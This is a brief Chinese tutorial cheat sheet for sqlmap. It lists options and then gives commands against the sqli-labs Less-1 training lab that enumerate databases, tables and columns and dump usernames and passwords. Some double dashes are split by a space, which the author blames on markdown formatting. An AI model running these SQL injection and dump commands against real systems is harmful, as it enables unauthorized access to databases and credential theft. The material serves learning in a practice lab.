- -u 漏洞url-data “vul” POST内容
–dbs 罗列所有数据库
-D 指定数据库 –tables列表
-D 指定数据库 -T 指定表 –columns 列所有字段
-D 指定数据库 -T 指定表 -C 指定字段 –dump 获取数据
–random-agent 随机ua头
–level -risk 设置扫描等级
sqlmap -u “http://10.6.67.209:8881/sqli-labs/Less-1/?id=1“ - -dbs
查询数据库sqlmap -u “http://10.6.67.209:8881/sqli-labs/Less-1/?id=1“ - -current-db
查询当前使用的数据库sqlmap -u “http://10.6.67.209:8881/sqli-labs/Less-1/?id=1“ -D security - -tables
查询所有的表sqlmap -u “http://10.6.67.209:8881/sqli-labs/Less-1/?id=1“ -D security -T users - -columns
查询表中所有字段sqlmap -u “http://10.6.67.209:8881/sqli-labs/Less-1/?id=1“ -D security -T users -C username,password - -dump
指定查询的列两条
-之间没有空格,style在编辑的时候,两条-之间没加空格,它们会连在一起,不容易看出,额,markdown用的不是很熟~
SQLMAP提数据
Your support will encourage me to continue to create!
